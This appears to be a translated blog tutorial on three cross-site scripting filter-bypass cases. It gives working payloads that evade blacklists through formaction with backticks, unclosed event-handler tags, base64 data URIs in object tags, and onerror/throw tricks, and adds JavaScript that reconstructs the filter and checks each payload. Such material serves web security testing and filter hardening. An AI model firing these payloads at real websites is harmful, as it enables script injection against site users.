XSS Bypass: Real Cases

Case I

1. Inject a simple probe value (998) into the input point and confirm it is reflected, i.e. the output is user-controllable.

2. Inject special characters (" < > ? / ') to determine which of them are filtered.

3. Inject tags and event handlers to determine how they are filtered.

The filter is probably a regex-based blacklist:

Dangerous event handlers followed by an equals sign are filtered out.

src is deleted.

alert followed by () is replaced with an empty string.

Any tag that has a closing > character is removed outright.

...

4. Final payload

Fuzzing found the formaction attribute unfiltered; backticks (`) replace the parentheses that alert() would need, so the alert() rule never matches:

"/><input type="submit" formaction=Javascript:alert`998`//

Fuzzing also found the oninput event unfiltered. The injected tag is deliberately left unclosed, so the "tag with a closing >" rule never matches, and the browser's parser completes the tag itself.

Or:

"><input type="text" oninput="prompt(998)"<
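The blacklist described above can be reconstructed well enough to check the two final payloads against it offline. The following is an added example, not code from the original post; the regex rules and the list of blocked event names are assumptions reconstructed from the write-up (the real target's filter is unknown), and the reflection context is assumed to be an attribute value.

```javascript
// Added example: reconstruction of the Case I blacklist filter (assumed rules,
// not the real target's code) and the payloads run through it.

// Assumed blacklist of event handlers the filter knows about. oninput and the
// formaction attribute are deliberately absent: that gap is what fuzzing found.
const BLOCKED_EVENTS = ['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus', 'onblur', 'onkeyup'];

function blacklistFilter(input) {
  let out = input;
  // Rule 1: a blocked event handler followed by '=' is stripped.
  const eventRe = new RegExp(`(${BLOCKED_EVENTS.join('|')})\\s*=`, 'gi');
  out = out.replace(eventRe, '');
  // Rule 2: 'src' is deleted wherever it appears.
  out = out.replace(/src/gi, '');
  // Rule 3: 'alert' followed by '(' is replaced with an empty string.
  out = out.replace(/alert\s*\(/gi, '');
  // Rule 4: any tag that has a closing '>' is removed wholesale.
  out = out.replace(/<[^>]*>/g, '');
  return out;
}

// Assumed reflection context: the value lands inside an attribute.
function render(filtered) {
  return `<input type="text" value="${filtered}">`;
}

// The two final payloads from the write-up.
const PAYLOAD_FORMACTION = '"/><input type="submit" formaction=Javascript:alert`998`//';
const PAYLOAD_ONINPUT = '"><input type="text" oninput="prompt(998)"<';
// Naive payloads, for contrast: both hit the blacklist.
const NAIVE_IMG = '<img src=x onerror=alert(1)>';
const NAIVE_SVG = '<svg onload=alert(1)';

// True when the filter leaves the payload byte-for-byte intact.
function survives(payload) {
  return blacklistFilter(payload) === payload;
}

for (const p of [PAYLOAD_FORMACTION, PAYLOAD_ONINPUT, NAIVE_IMG, NAIVE_SVG]) {
  console.log(JSON.stringify(p), '->', JSON.stringify(blacklistFilter(p)), survives(p) ? 'SURVIVES' : 'mangled');
}
// In the rendered markup the '//' turns the trailing '"' of the original
// attribute into a JavaScript comment inside the javascript: URL.
console.log(render(blacklistFilter(PAYLOAD_FORMACTION)));
```

Both write-up payloads pass through unchanged because neither contains a blocked event name, `src`, `alert(`, or a `<...>` pair; the naive `<img>` payload is deleted entirely and the unclosed `<svg>` payload is reduced to `<svg 1)`.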

Case II

1. Inject a simple probe value (998) into the input point and confirm it is reflected, i.e. the output is user-controllable.

2. Some special characters are escaped and some tags are filtered.

3. Fuzzing finds the object tag unfiltered.

4. Final payload

998"/<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCg5OTgpPC9zY3JpcHQ+">998<!--
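Before firing a base64 data: URI payload it is worth decoding it to confirm exactly what the `<object>` will render. The following is an added example, not code from the original post: it rebuilds the Case II payload from a script string and decodes a payload back. The marker value 998 and the `<!--` tail (which opens an HTML comment that swallows the remainder of the original markup) are taken from the post; the helper names are my own.

```javascript
// Added example: construct and verify the Case II <object> payload.
// The payload string below is copied from the post.
const OBJECT_PAYLOAD_FROM_POST =
  '998"/<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCg5OTgpPC9zY3JpcHQ+">998<!--';

// Wrap a script body in <script> tags, base64-encode it and drop it into the
// data: URI of an <object>. The trailing '<!--' comments out whatever follows
// the injection point in the original page.
function buildObjectPayload(script, marker = '998') {
  const html = `<script>${script}</script>`;
  const b64 = Buffer.from(html, 'utf8').toString('base64');
  return `${marker}"/<object data="data:text/html;base64,${b64}">${marker}<!--`;
}

// Pull the base64 body out of a payload and decode it, so the document the
// browser will render can be inspected before use. Returns null if absent.
function decodeObjectPayload(payload) {
  const m = /data:text\/html;base64,([A-Za-z0-9+/=]+)/.exec(payload);
  return m ? Buffer.from(m[1], 'base64').toString('utf8') : null;
}

console.log('decoded:', decodeObjectPayload(OBJECT_PAYLOAD_FROM_POST));
console.log('rebuilt matches post:', buildObjectPayload('alert(998)') === OBJECT_PAYLOAD_FROM_POST);
```

The post's payload decodes to `<script>alert(998)</script>`; the base64 body is 36 characters because the 27-byte document encodes without padding, which is why the final `+` matters and cannot be dropped.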

Case III

Parentheses and semicolons are filtered.

1. The working principle is to set the onerror handler to the function you want to call; the throw statement is then used to pass the argument to that function.

Payload:

<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>

The onerror handler is invoked every time an uncaught JavaScript exception is raised, and the throw statement lets you raise a custom exception whose value is passed (as the error message) to the onerror handler. Because throw is a statement, a semicolon is normally needed after the onerror assignment to start a new statement rather than form a single expression; the second payload gets the same separation without a semicolon by wrapping the assignment in a block.

2. Since throw accepts an expression, the onerror assignment can be placed inside the throw statement itself. The comma operator evaluates each operand and yields the last one, so the assignment happens as a side effect and the final value is what gets thrown and handed to the onerror handler, which calls the chosen function with the chosen argument (browsers prefix the message, so Chromium's alert reads "Uncaught haha").

<script>throw onerror=alert,'some string',123,'haha'</script>
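The three Case III payloads can be exercised in Node to see what each one assigns to onerror, what value it throws, and which of them actually avoid both filtered characters. The following is an added example, not code from the original post; browser dispatch of window.onerror is simulated with a stub (the "Uncaught <value>" message format is Chromium's, and other browsers differ), and `alert` is replaced by a recording stub.

```javascript
// Added example: run the Case III payloads in sloppy mode and inspect the result.
const calls = [];
// Stub alert: records what it would have displayed.
globalThis.alert = (msg) => { calls.push(msg); };

// Execute a payload body the way inline <script> text would run (sloppy mode,
// so 'onerror=alert' creates/assigns the global). Reports the thrown value and
// whatever ended up in the global onerror slot.
function runPayload(body) {
  delete globalThis.onerror;
  let thrown;
  try {
    new Function(body)();
  } catch (e) {
    thrown = e;
  }
  return { thrown, handler: globalThis.onerror };
}

// Approximation of the browser's uncaught-exception path: window.onerror is
// called with the error message string. Returns what the stub alert received.
function dispatchUncaught(result) {
  if (typeof result.handler === 'function') {
    result.handler(`Uncaught ${String(result.thrown)}`);
  }
  return calls[calls.length - 1];
}

// Does the payload contain none of the characters the Case III filter blocks?
function passesFilter(body) {
  return !/[();]/.test(body);
}

const PAYLOADS = [
  "onerror=alert;throw 1337",                      // needs a semicolon: blocked here
  "{onerror=alert}throw 1337",                     // block statement, no semicolon
  "throw onerror=alert,'some string',123,'haha'",  // assignment inside the throw expression
];

for (const body of PAYLOADS) {
  const r = runPayload(body);
  console.log(JSON.stringify(body),
    '| passes filter:', passesFilter(body),
    '| handler is alert:', r.handler === globalThis.alert,
    '| thrown:', JSON.stringify(r.thrown),
    '| alert receives:', JSON.stringify(dispatchUncaught(r)));
}
```

Only the second and third payloads pass the parentheses-and-semicolon filter; the first contains a `;`. In the third, the comma expression leaves `'haha'` as the thrown value, so the handler receives `Uncaught haha`, not `'some string'` or `123`.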


PS: some of this information is drawn from online references.


Origin blog.csdn.net/qq_39326816/article/details/91899760